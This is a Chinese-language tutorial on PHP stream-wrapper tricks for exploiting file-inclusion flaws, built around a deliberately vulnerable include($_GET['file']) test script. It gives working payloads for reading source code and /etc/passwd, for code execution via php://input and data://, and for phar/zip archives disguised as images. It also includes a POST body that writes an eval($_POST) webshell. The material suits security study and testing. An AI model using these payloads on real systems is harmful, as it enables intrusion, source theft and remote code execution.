0x00:PHP伪协议:

PHP带有很多内置URL风格的封装协议,可用于类似 fopen()、copy()、file_exists() 和 filesize() 的文件系统函数。除了这些封装协议,还能通过 stream_wapper_register 来注册自定义的封装协议。

  1. file:// — 访问本地文件系统
  2. http:// — 访问 HTTP(s) 网址
  3. ftp:// — 访问 FTP(s) URLs
  4. php:// — 访问各个输入/输出流(I/O streams)
  5. zlib:// — 压缩流
  6. data:// — 数据(RFC 2397)
  7. glob:// — 查找匹配的文件路径模式
  8. phar:// — PHP 归档
  9. ssh2:// — Secure Shell 2
  10. rar:// — RAR
  11. ogg:// — 音频流
  12. expect:// — 处理交互式的流

可以在 phpinfo 中的Registered PHP Streams中找到可使用的协议。
下面的测试代码均为:

  1. <?php
  2. $file = $_GET['file'];
  3. include($file);
  4. ?>

若有特殊案例,会声名。

php.ini

  1. allow_url_fopen 默认为 On
  2. allow_url_include 默认为 Off

若有特殊要求,会在利用条件里指出。

0x01:php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。
image.png

可以运用多种过滤器(字符串/转换/压缩/加密)
例如平时我们用来任意文件读取的payload

  1. http://atest.test/1.php?x=php://filter/read=convert.base64-encode/resource=upload.php
  2. 这里读的过滤器为convert.base64-encode,就和字面上的意思一样,把输入流base64-encode
  3. resource=upload.php,代表读取upload.php的内容

这样就可以以base64编码的方式读取文件源代码

过滤器列表:字符串过滤器、转换过滤器、压缩过滤器、加密过滤器

可用过滤器列表:https://www.php.net/manual/zh/filters.php
利用条件:无

<字符串过滤器>

  1. string.rot13
  2. 进行rot13转换
  3. string.toupper
  4. 将字符全部大写
  5. string.tolower
  6. 将字符全部小写
  7. string.strip_tags
  8. 去除空字符、HTML PHP 标记后的结果。
  9. 功能类似于strip_tags()函数,若不想某些字符不被消除,后面跟上字符,可利用字符串或是数组两种方式。

举例

  1. <?php
  2. $fp = fopen('php://output', 'w');
  3. stream_filter_append($fp, 'string.rot13');
  4. echo "rot13:";
  5. fwrite($fp, "This is a test.\n");
  6. fclose($fp);
  7. echo "<br>";
  8. $fp = fopen('php://output', 'w');
  9. stream_filter_append($fp, 'string.toupper');
  10. echo "Upper:";
  11. fwrite($fp, "This is a test.\n");
  12. fclose($fp);
  13. echo "<br>";
  14. $fp = fopen('php://output', 'w');
  15. stream_filter_append($fp, 'string.tolower');
  16. echo "Lower:";
  17. fwrite($fp, "This is a test.\n");
  18. fclose($fp);
  19. echo "<br>";
  20. $fp = fopen('php://output', 'w');
  21. echo "Del1:";
  22. stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE);
  23. fwrite($fp, "<b>This is a test.</b>!!!!<h1>~~~~</h1>\n");
  24. fclose($fp);
  25. echo "<br>";
  26. $fp = fopen('php://output', 'w');
  27. echo "Del2:";
  28. stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE, "<b>");
  29. fwrite($fp, "<b>This is a test.</b>!!!!<h1>~~~~</h1>\n");
  30. fclose($fp);
  31. echo "<br>";
  32. $fp = fopen('php://output', 'w');
  33. stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE, array('b','h1'));
  34. echo "Del3:";
  35. fwrite($fp, "<b>This is a test.</b>!!!!<h1>~~~~</h1>\n");
  36. fclose($fp);
  37. ?>

image.png

<转换过滤器>

image.png

举例:

  1. <?php
  2. $fp = fopen('php://output', 'w');
  3. stream_filter_append($fp, 'convert.base64-encode');
  4. echo "base64-encode:";
  5. fwrite($fp, "This is a test.\n");
  6. fclose($fp);
  7. echo "<br>";
  8. $param = array('line-length' => 8, 'line-break-chars' => "\n");
  9. $fp = fopen('php://output', 'w');
  10. stream_filter_append($fp, 'convert.base64-encode', STREAM_FILTER_WRITE, $param);
  11. echo "\nbase64-encode-split:\n";
  12. fwrite($fp, "This is a test.\n");
  13. fclose($fp);
  14. echo "<br>";
  15. $fp = fopen('php://output', 'w');
  16. stream_filter_append($fp, 'convert.base64-decode');
  17. echo "\nbase64-decode:";
  18. fwrite($fp, "VGhpcyBpcyBhIHRlc3QuCg==\n");
  19. fclose($fp);
  20. echo "<br>";
  21. $fp = fopen('php://output', 'w');
  22. stream_filter_append($fp, 'convert.quoted-printable-encode');
  23. echo "quoted-printable-encode:";
  24. fwrite($fp, "This is a test.\n");
  25. fclose($fp);
  26. echo "<br>";
  27. $fp = fopen('php://output', 'w');
  28. stream_filter_append($fp, 'convert.quoted-printable-decode');
  29. echo "\nquoted-printable-decode:";
  30. fwrite($fp, "This is a test.=0A");
  31. fclose($fp);
  32. echo "<br>";
  33. ?>

image.png

<压缩过滤器>

image.png

zlib.* 压缩过滤器自 PHP 版本 5.1.0起可用,在激活 zlib的前提下。也可以通过安装来自 » PECL的 » zlib_filter包作为一个后门在 5.0.x版中使用。

此过滤器在 PHP 4 中 不可用。

  1. <?php
  2. $params = array('level' => 6, 'window' => 15, 'memory' => 9);
  3. $original_text = "This is a test.\nThis is only a test.\nThis is not an important string.\n";
  4. echo "The original text is " . strlen($original_text) . " characters long.\n";
  5. $fp = fopen('test.deflated', 'w');
  6. stream_filter_append($fp, 'zlib.deflate', STREAM_FILTER_WRITE, $params);
  7. fwrite($fp, $original_text);
  8. fclose($fp);
  9. echo "The compressed file is " . filesize('test.deflated') . " bytes long.\n";
  10. echo "The original text was:\n";
  11. /* Use readfile and zlib.inflate to decompress on the fly */
  12. readfile('php://filter/zlib.inflate/resource=test.deflated');
  13. /* Generates output:
  14. The original text is 70 characters long.
  15. The compressed file is 56 bytes long.
  16. The original text was:
  17. This is a test.
  18. This is only a test.
  19. This is not an important string.
  20. */
  21. ?>

<加密过滤器>

image.png

利用姿势1:

  1. index.php?file=php://filter/read=convert.base64-encode/resource=index.php

通过指定末尾的文件,可以读取经base64加密后的文件源码,之后再base64解码一下就行。虽然不能直接获取到shell等,但能读取敏感文件危害也是挺大的。同时也能够对网站源码进行审计。

文件包含漏洞之伪协议 - 图7

利用姿势2:

  1. index.php?file=php://filter/convert.base64-encode/resource=index.php

效果跟前面一样,只是少了个read关键字,在绕过一些waf时也许有用。

文件包含漏洞之伪协议 - 图8
注意:如果发现中文乱码建议重新使用其他网站的 base64 解码功能。

0x02:file://协议

专们用于访问本地文件系统和php://filter类似都可以对本地文件进行读取
用法
?file=file://[文件的绝对路径+文件名]

利用条件:无

利用姿势:

  1. index.php?file=file:///etc/passwd

image.png

0x03:PHP://input协议

php://input 是个可以用来访问请求的原始数据的只读流,将POST请求中的数据作为PHP代码执行

因为它不依赖于特定的 php.ini 指令。
注:enctype=”multipart/form-data” 的时候 php://input 是无效的。

利用条件:

  1. allow_url_include = On # 必须开启
  2. allow_url_fopen = On/Off

利用姿势:

  1. index.php?file=php://input
  2. POST:<?php phpinfo();?>/<? phpinfo();?>

文件包含漏洞之伪协议 - 图10
也可以使用burpsuite或curl进行利用

  1. index.php?file=php://input
  2. POST:<?php phpinfo();?>/<? phpinfo();?>

Getshell

  1. POST:
  2. <?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[Qftm])?>');?>

0x04:data://

data:资源类型;编码,内容

  1. data:,<文本数据>
  2. data:text/plain,<文本数据>
  3. data:text/html,<HTML代码>data:text/html;base64,<base64编码的HTML代码>
  4. data:text/css,<CSS代码>
  5. data:text/css;base64,<base64编码的CSS代码>
  6. data:text/javascript,<Javascript代码>
  7. data:text/javascript;base64,<base64编码的Javascript代码>
  8. data:image/gif;base64,base64编码的gif图片数据
  9. data:image/png;base64,base64编码的png图片数据
  10. data:image/jpeg;base64,base64编码的jpeg图片数据
  11. data:image/x-icon;base64,base64编码的icon图片数据

数据流封装器,和php://相似都是利用了流的概念
当allow_url_include 打开的时候,任意文件包含就会成为任意命令执行

利用条件:

  1. php >= 5.2
  2. allow_url_fopen = On
  3. allow_url_include = On

利用姿势:

  1. index.php?file=data:text/plain,<?php phpinfo();?>
  2. index.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
  3. index.php?file=data://text/plain,<?php phpinfo();?>
  4. index.php?file=data://text/plain,<?php phpinfo();
  5. index.php?a=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

image.png

0x05:phar://

phar:// 支持zip、phar格式的文件包含。

zip包含:

用法:

  1. ?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名]
  2. ?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]

利用条件:php >= 5.3.0
利用姿势1
配合文件上传漏洞,当仅可以上传zip格式时

  1. index.php?file=phar://index.zip/index.txt
  2. index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/index.zip/index.txt

image.png
利用姿势2
配合文件上传漏洞,当仅可以上传图片格式时
针对phar://不管后缀是什么,都会当做压缩包来解压。

  1. index.php?file=phar://head.png/head.txt
  2. index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png/head.txt

将做好的zip后缀改为png格式
image.png

phar:

phar文件本质上是也一种压缩文件。
用法

  1. ?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名]
  2. ?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]

制作phar文件
制作包含恶意代码文件的phar文件
(1)确保本地php.ini中phar.readonly=Off
image.png
(2)编写恶意phar文件的php脚本
phar.php

  1. <?php
  2. @unlink("phar.phar");
  3. $phar = new Phar("phar.phar");
  4. $phar->startBuffering();
  5. $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
  6. $phar->addFromString("head.txt", "<?php phpinfo();?>"); //添加要压缩的文件及内容 //签名自动计算
  7. $phar->stopBuffering();?>

(3)生成phar文件

  1. <?php
  2. $p = new PharData(dirname(__FILE__).'/phartest.aaa', 0,'phartest',Phar::ZIP);
  3. $p->addFromString('testfile.txt', '<?php phpinfo();?>');
  4. ?>

利用条件:php >= 5.3.0
利用姿势1:

  1. index.php?file=phar://phar.phar/head.txt
  2. index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.phar/head.txt

image.png

利用姿势2

  1. index.php?file=phar://phar.png/head.txt
  2. index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.png/head.txt

利用协议特性,更改后缀文件可适当绕过一些限制
image.png

0x06:ZIP://

zip协议和 phar 协议类似,都支持相对路径和绝对路径(几乎网上所有人都说zip 协议不支持相对路径,事实上是可以!!!)

在 php version 5.2.9 时已经修复了zip:// 相对路径问题
image.png
注意:使用 zip 协议,需将 # 编码为 %23 (浏览器时)

用法:

  1. ?file=zip://[压缩包文件相对路径]#[压缩文件内的子文件名]
  2. ?file=zip://[压缩包文件绝对路径]#[压缩文件内的子文件名]

利用条件:

php >= 5.2(绝对路径) | php >= 5.29(相对/绝对路径)

利用姿势1:

  1. index.php?file=zip://head.zip%23head.txt
  2. index.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.zip%23head.txt

image.png

利用姿势2:

针对zip://不管后缀是什么,都会当做压缩包来解压,可以适当的绕过一些限制。

  1. index.php?file=zip://head.png%23head.txt
  2. index.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png%23head.txt

相对路径
php5.3.29 windows
image.png

php5.5.9 windows
image.png

5.4.16 Linux Centos7
image.png

绝对路径
windows
image.png

Linux Centos7
image.png

0x07:bzip2://

用法:

  1. ?file=compress.bzip2://[压缩包文件相对路径]
  2. ?file=compress.bzip2://[压缩包文件绝对路径]

利用条件:

php >= 5.2

利用姿势1:

  1. index.php?file=compress.bzip2://head.bz2
  2. index.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.bz2

相对路径
image.png
绝对路径
image.png

利用姿势2:

利用协议特性,更改后缀文件可适当绕过一些限制

  1. index.php?file=compress.bzip2://head.jpg
  2. index.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg

image.png

0x08:zlib://

用法:

  1. ?file=compress.zlib://[压缩包文件相对路径]
  2. ?file=compress.zlib://[压缩包文件绝对路径]

利用条件:

php >= 5.2

利用姿势1:

  1. index.php?file=compress.zlib://head.gz
  2. index.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.gz

相对路径
image.png

绝对路径
image.png

利用姿势2:

利用协议特性,更改后缀文件可适当绕过一些限制

  1. index.php?file=compress.zlib://head.jpg
  2. index.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg

image.png